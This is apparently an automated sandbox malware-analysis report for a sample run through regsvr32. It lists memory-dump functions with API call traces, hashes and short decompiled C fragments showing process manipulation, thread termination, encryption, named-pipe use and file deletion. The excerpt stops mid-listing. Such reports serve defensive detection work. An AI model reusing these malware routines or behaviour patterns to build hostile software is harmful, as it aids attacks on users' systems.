                  • Part of subcall function 04BE0929: GetModuleHandleA.KERNEL32(?,0624978E,?,00000000,00000000), ref: 04BE097B
                  • Part of subcall function 04BE0929: GetProcAddress.KERNEL32(00000000), ref: 04BE0982
                  • Part of subcall function 04BE0929: Thread32First.KERNEL32(00000001,0000001C), ref: 04BE0992
                  • Part of subcall function 04BE0929: CloseHandle.KERNEL32(00000001), ref: 04BE09DA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                • String ID:
                • API String ID: 2627809124-0
                • Opcode ID: b01101196422086b63c7957756463c846493cbce6e027fd80c5b4f5ea57f62ce
                • Instruction ID: 36fe0bc3f23dbad5dc8b3bfb75502fcb0e1b2e1b9415f9a98939b6723a69e8fb
                • Opcode Fuzzy Hash: b01101196422086b63c7957756463c846493cbce6e027fd80c5b4f5ea57f62ce
                • Instruction Fuzzy Hash: E7012CB5614119BFEB01EBAAED84C9FB7ADEB85248B00009AF501A7101DA75FE00DB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BD4930,04BE3A35,00000000,00000000), ref: 04BD73B7
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                  • Part of subcall function 04BCB823: lstrlen.KERNEL32(04BC1127,?,00000000,00000000,04BC2C06,00000011,04BC1127,00000001,00000000,?,-00000008,?,04BC1127,00000000,?,?), ref: 04BCB853
                  • Part of subcall function 04BCB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 04BCB869
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,?,00000000), ref: 04BCB89F
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,00000000,?), ref: 04BCB8BA
                  • Part of subcall function 04BCB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 04BCB8D8
                  • Part of subcall function 04BCB823: GetLastError.KERNEL32 ref: 04BCB8E2
                  • Part of subcall function 04BCB823: HeapFree.KERNEL32(00000000,00000000), ref: 04BCB905
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                • String ID:
                • API String ID: 730886825-0
                • Opcode ID: 3f8c83603d5b58a6f86892007eebdb38d1fa5cb47db648f9c464ac4e0ec78e40
                • Instruction ID: d532a665d53f90e83230fddb66fd83a2c48c9d173ee0c702860a794b627ce5e0
                • Opcode Fuzzy Hash: 3f8c83603d5b58a6f86892007eebdb38d1fa5cb47db648f9c464ac4e0ec78e40
                • Instruction Fuzzy Hash: 52014871650204BFEB11DB95DD4AF9E7BACEB89714F1000AABA01AB180EA74FA01D771
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BD5E25
                  • Part of subcall function 04BC3B19: memset.NTDLL ref: 04BC3B3F
                  • Part of subcall function 04BC3B19: memcpy.NTDLL ref: 04BC3B67
                  • Part of subcall function 04BC3B19: GetLastError.KERNEL32(00000010,00000218,04BE6D9D,00000100,?,00000318,00000008), ref: 04BC3B7E
                  • Part of subcall function 04BC3B19: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BE6D9D,00000100), ref: 04BC3C61
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 4290293647-0
                • Opcode ID: 270f7e34cd2cb4f7bf9ccf490feb579312da5e8d031558273eb892fd7c3af9db
                • Instruction ID: 4e13317abd155e3c2cbbab620a2df105bad2405ac6bb052ca059515488c4c491
                • Opcode Fuzzy Hash: 270f7e34cd2cb4f7bf9ccf490feb579312da5e8d031558273eb892fd7c3af9db
                • Instruction Fuzzy Hash: 8F01AD306013186BD731AF29D880F9B7BE8EF45718F0088AAFC4496240E3B1F9549AA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E031F1628(void* __ecx, void* __edx, void* _a4, void* _a8) {
                				void* _t13;
                				void* _t21;
                
                				_t11 =  &_a4;
                				_t21 = 0;
                				__imp__( &_a8);
                				_t13 = E031F78F2( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                				if(_t13 == 0) {
                					_t21 = E031F2114(_a8 + _a8);
                					if(_t21 != 0) {
                						E031F4AF1(_a4, _t21, _t23);
                					}
                					E031F2C11(_a4);
                				}
                				return _t21;
                			}


                APIs
                • lstrlen.KERNEL32(?,?,?,00000000,?,031F5328,00000000,?,?,?,031F7675,?,056095B0), ref: 031F1639
                  • Part of subcall function 031F78F2: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,031F7307), ref: 031F792A
                  • Part of subcall function 031F78F2: memcpy.NTDLL(?,031F7307,00000010,?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92), ref: 031F7943
                  • Part of subcall function 031F78F2: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 031F796C
                  • Part of subcall function 031F78F2: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 031F7984
                  • Part of subcall function 031F78F2: memcpy.NTDLL(00000000,031F4F92,031F7307,0000011F), ref: 031F79D6
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 40d9a68e571e64b10c0b8928600349a357b34b0c0e27a8d866f0d6367f9da1b5
                • Instruction ID: f8d9c44ebb04e092b2f662d4940192743e985e6cf8bf2965aff833126d83e7b2
                • Opcode Fuzzy Hash: 40d9a68e571e64b10c0b8928600349a357b34b0c0e27a8d866f0d6367f9da1b5
                • Instruction Fuzzy Hash: 84F0D07A100209BFCF11EE55DC44DDE3BADDF89660B048021FE19CA114DB71D55697A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F2BC9(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                				void* _t17;
                
                				if(_a4 == 0) {
                					L2:
                					return E031F1DCD(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                				}
                				_t17 = E031F7178(_a4, _a8, _a12, _a16, _a20); // executed
                				if(_t17 != 0) {
                					goto L2;
                				}
                				return _t17;
                			}


                APIs
                • lstrlenW.KERNEL32(?,?,?,031F1D41,3D031F90,80000002,031F61AC,031F19CD,74666F53,4D4C4B48,031F19CD,?,3D031F90,80000002,031F61AC,?), ref: 031F2BEE
                  • Part of subcall function 031F7178: SysAllocString.OLEAUT32(031F19CD), ref: 031F7192
                  • Part of subcall function 031F7178: SysFreeString.OLEAUT32(00000000), ref: 031F71D2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFreelstrlen
                • String ID:
                • API String ID: 3808004451-0
                • Opcode ID: c3c503369fff5068091f288a78f5b30965d737d25555e74e4bbf11b0cddca122
                • Instruction ID: cee02f68a1a684fe9c1f391cf6953f3850a955e9a54f818dbc03f9bc859bcbd8
                • Opcode Fuzzy Hash: c3c503369fff5068091f288a78f5b30965d737d25555e74e4bbf11b0cddca122
                • Instruction Fuzzy Hash: 3DF02B3600420EBFDF16AF90DD45EAA7F6AEF18390F048425BA14580A1D772D5B2EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F4F81(void* __edi, void* _a4) {
                				int _t7;
                				int _t12;
                
                				_t7 = E031F1A55(__edi, _a4,  &_a4); // executed
                				_t12 = _t7;
                				if(_t12 != 0) {
                					memcpy(__edi, _a4, _t12);
                					 *((char*)(__edi + _t12)) = 0;
                					E031F2C11(_a4);
                				}
                				return _t12;
                			}


                APIs
                  • Part of subcall function 031F1A55: memcpy.NTDLL(00000000,00000110,?,?,?,?,031F4F92,?,031F7307,031F7307,?), ref: 031F1A8B
                  • Part of subcall function 031F1A55: memset.NTDLL ref: 031F1B00
                  • Part of subcall function 031F1A55: memset.NTDLL ref: 031F1B14
                • memcpy.NTDLL(?,031F7307,00000000,?,031F7307,031F7307,?,?,031F7307,?), ref: 031F4F9D
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memcpymemset$FreeHeap
                • String ID:
                • API String ID: 3053036209-0
                • Opcode ID: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction ID: 557228cfb4ac79d119e66d73bf9de3935ae1da1e028a9773ef20c1aa6864c19f
                • Opcode Fuzzy Hash: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction Fuzzy Hash: 72E0863A405219BBCB126A95DC00DEBBF5C9F49690F044020FF084A200D732C55097E1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BCF611
                  • Part of subcall function 04BDA2DD: RegOpenKeyExA.KERNELBASE(04BCF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA324
                  • Part of subcall function 04BDA2DD: RegOpenKeyExA.ADVAPI32(04BCF629,04BCF629,00000000,00020019,80000001,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA33A
                  • Part of subcall function 04BDA2DD: RegCloseKey.ADVAPI32(80000001,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA383
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Open$Closememset
                • String ID:
                • API String ID: 1685373161-0
                • Opcode ID: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction ID: c0df2491640ade761eb3138403c07756e4016db753763570a04d2aacabe09226
                • Opcode Fuzzy Hash: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction Fuzzy Hash: F9E0C23520010CB7EF10AF45CC41F987718DF08348F0080A8BE0D5E682DA32F664D7D0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C,?,00000318), ref: 04BC95F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: d969479d878991df9021e66e169501d4c7baca5d0553f96608c8b999ced7c3ad
                • Instruction ID: 593357a737575717f99e749618b9b98fc8239d31dbc14b71b009bb44b6b03770
                • Opcode Fuzzy Hash: d969479d878991df9021e66e169501d4c7baca5d0553f96608c8b999ced7c3ad
                • Instruction Fuzzy Hash: 90D01730D00619DBDB209B95DC8A9AEFB70FF48720F608264E86077190C7302E12CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 04BC1DA3
                • GetLastError.KERNEL32 ref: 04BC1DB1
                • NtSetInformationProcess.NTDLL ref: 04BC1E0B
                • GetProcAddress.KERNEL32(?,00000000), ref: 04BC1E4A
                • GetProcAddress.KERNEL32(?), ref: 04BC1E6B
                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04BC1EC2
                • CloseHandle.KERNEL32(?), ref: 04BC1ED8
                • CloseHandle.KERNEL32(?), ref: 04BC1EFE
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                • String ID:
                • API String ID: 3529370251-0
                • Opcode ID: 20bdead82b94c57cb6f2942c44d3f92d0092b17078a1660a0a42d26bbe1acd34
                • Instruction ID: 0b9faa38681d7816f0298caa865a54e5379bc144b6f44958f4f44487d4f61a6f
                • Opcode Fuzzy Hash: 20bdead82b94c57cb6f2942c44d3f92d0092b17078a1660a0a42d26bbe1acd34
                • Instruction Fuzzy Hash: CB415A70204346DFDB109F29C884A5ABBE9FB88348F000E6EF554E7152D774EA48CF62
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04BC3F14
                • lstrlenW.KERNEL32(?), ref: 04BC3F22
                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04BC3F4D
                • lstrcpyW.KERNEL32(00000006,00000000), ref: 04BC3F7A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Query$lstrcpylstrlen
                • String ID:
                • API String ID: 3961825720-0
                • Opcode ID: 0d0b8dc642db9bf61e7104ab4d0b03d37f4274957150225c91e64d784726a498
                • Instruction ID: e5c9fd41544e6f876f0edb78bcd6d8740ed9ab94df9f1e03b540acdfb723d834
                • Opcode Fuzzy Hash: 0d0b8dc642db9bf61e7104ab4d0b03d37f4274957150225c91e64d784726a498
                • Instruction Fuzzy Hash: 16414C71500209FFEF11DFA9C984AAEBBB8EF44304F4184AAF905A7250D775EA119BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL ref: 04BD07A3
                • GetTickCount.KERNEL32 ref: 04BD07BD
                • wsprintfA.USER32 ref: 04BD0810
                • QueryPerformanceFrequency.KERNEL32(?), ref: 04BD081C
                • QueryPerformanceCounter.KERNEL32(?), ref: 04BD0827
                • _aulldiv.NTDLL(?,?,?,?), ref: 04BD083D
                • wsprintfA.USER32 ref: 04BD0853
                • wsprintfA.USER32 ref: 04BD0878
                • HeapFree.KERNEL32(00000000,?), ref: 04BD088B
                • wsprintfA.USER32 ref: 04BD08AF
                • HeapFree.KERNEL32(00000000,?), ref: 04BD08C2
                • wsprintfA.USER32 ref: 04BD08FC
                • wsprintfA.USER32 ref: 04BD0920
                • lstrcat.KERNEL32(?,?), ref: 04BD0958
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BD0972
                • GetTickCount.KERNEL32 ref: 04BD0982
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BD0996
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BD09B4
                • StrTrimA.SHLWAPI(00000000,04BE83F8,00000000,0624C0E0), ref: 04BD09ED
                • lstrcpy.KERNEL32(00000000,?), ref: 04BD0A0F
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04BD0A16
                • lstrcat.KERNEL32(00000000,?), ref: 04BD0A1D
                • lstrcat.KERNEL32(00000000,?), ref: 04BD0A24
                • HeapFree.KERNEL32(00000000,?,00000000,?,04BD7E99,?,?,00000000), ref: 04BD0A9E
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BD0AB0
                • HeapFree.KERNEL32(00000000,00000000,00000000,0624C0E0), ref: 04BD0ABF
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD0AD1
                • HeapFree.KERNEL32(00000000,?), ref: 04BD0AE3
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                • String ID:
                • API String ID: 3373977504-0
                • Opcode ID: ca363a752dd9935ca2cd4ccc9e2218b6512a91619b61c00f8dc0a727c938acf2
                • Instruction ID: 36ac317a8d9ac1d47a8911537790557cf981e206bb61913910409746ccb3d188
                • Opcode Fuzzy Hash: ca363a752dd9935ca2cd4ccc9e2218b6512a91619b61c00f8dc0a727c938acf2
                • Instruction Fuzzy Hash: 96A17F71500206AFDB01EF7AEC84E6A7BE8FB88304F04446AF548DB152E779E9199F71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,04BC158F,74E5F710,00000000,00000000), ref: 04BD7E24
                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04BD7E42
                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04BC158F), ref: 04BD7E6E
                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,04BC158F), ref: 04BD7EDC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD7F54
                • wsprintfA.USER32 ref: 04BD7F70
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD7F7B
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD7F92
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD801E
                • wsprintfA.USER32 ref: 04BD8039
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD8044
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD805B
                • HeapFree.KERNEL32(00000000,04BC158F,?,?,00000008,0000000B,?,04BC158F,04BC158F,00000001,?,00000000,?,?,04BC158F), ref: 04BD807D
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD8098
                • wsprintfA.USER32 ref: 04BD80AF
                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80BA
                  • Part of subcall function 04BCB823: lstrlen.KERNEL32(04BC1127,?,00000000,00000000,04BC2C06,00000011,04BC1127,00000001,00000000,?,-00000008,?,04BC1127,00000000,?,?), ref: 04BCB853
                  • Part of subcall function 04BCB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 04BCB869
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,?,00000000), ref: 04BCB89F
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,00000000,?), ref: 04BCB8BA
                  • Part of subcall function 04BCB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 04BCB8D8
                  • Part of subcall function 04BCB823: GetLastError.KERNEL32 ref: 04BCB8E2
                  • Part of subcall function 04BCB823: HeapFree.KERNEL32(00000000,00000000), ref: 04BCB905
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80D1
                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06248A20,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80FD
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                • String ID:
                • API String ID: 3130754786-0
                • Opcode ID: f5ea6a08fb7417fc94c312c77b7958816cc03623e491de225d9a3a70b895cc34
                • Instruction ID: fd12f8e67d1acd464826eb96f107f356a3e3698c0aa848cabca5d5ed39cd1069
                • Opcode Fuzzy Hash: f5ea6a08fb7417fc94c312c77b7958816cc03623e491de225d9a3a70b895cc34
                • Instruction Fuzzy Hash: F2A17071900209EFEB20EFA6DC84DAEBBB9FB84305F0044AAF505A7111E735AE44DB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?), ref: 04BDC467
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 04BDD3E9
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BC39E4), ref: 04BDD3F5
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD43D
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD458
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD490
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?), ref: 04BDD498
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD4BB
                  • Part of subcall function 04BDD39D: wcscpy.NTDLL ref: 04BDD4CD
                  • Part of subcall function 04BDD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BDD4F3
                  • Part of subcall function 04BDD39D: RtlEnterCriticalSection.NTDLL(?), ref: 04BDD528
                  • Part of subcall function 04BDD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 04BDD544
                  • Part of subcall function 04BDD39D: FindNextFileW.KERNEL32(?,00000000), ref: 04BDD55D
                  • Part of subcall function 04BDD39D: WaitForSingleObject.KERNEL32(00000000), ref: 04BDD56F
                  • Part of subcall function 04BDD39D: FindClose.KERNEL32(?), ref: 04BDD584
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD598
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD5BA
                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04BDC4C3
                • memcpy.NTDLL(00000000,?,00000000), ref: 04BDC4D6
                • lstrcpyW.KERNEL32(00000000,?), ref: 04BDC4ED
                  • Part of subcall function 04BDD39D: FindNextFileW.KERNEL32(?,00000000), ref: 04BDD630
                  • Part of subcall function 04BDD39D: WaitForSingleObject.KERNEL32(00000000), ref: 04BDD642
                  • Part of subcall function 04BDD39D: FindClose.KERNEL32(?), ref: 04BDD65D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04BDC518
                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04BDC530
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDC58A
                • lstrlenW.KERNEL32(00000000,?), ref: 04BDC5AD
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDC5BF
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04BDC633
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC643
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04BDC66C
                • lstrlenW.KERNEL32(04BEF878,?), ref: 04BDC6E6
                • DeleteFileW.KERNEL32(?,?), ref: 04BDC714
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC722
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC743
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                • String ID:
                • API String ID: 72361108-0
                • Opcode ID: 3717180ab8de3560b7d7df3afe8dfe8bde11e71d287b0e11efc49f80104c3208
                • Instruction ID: 6b459039128ae43027f009be355673e249af9e74047f9b65c4944f2c168073ed
                • Opcode Fuzzy Hash: 3717180ab8de3560b7d7df3afe8dfe8bde11e71d287b0e11efc49f80104c3208
                • Instruction Fuzzy Hash: 1191287160121ABFDB10DFA6DC88DAA7BBCFB88354B044496F509DB152E334EA45CB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BDEF49
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BDEF66
                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04BDEFB6
                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04BDEFC0
                • GetLastError.KERNEL32 ref: 04BDEFCA
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDEFDB
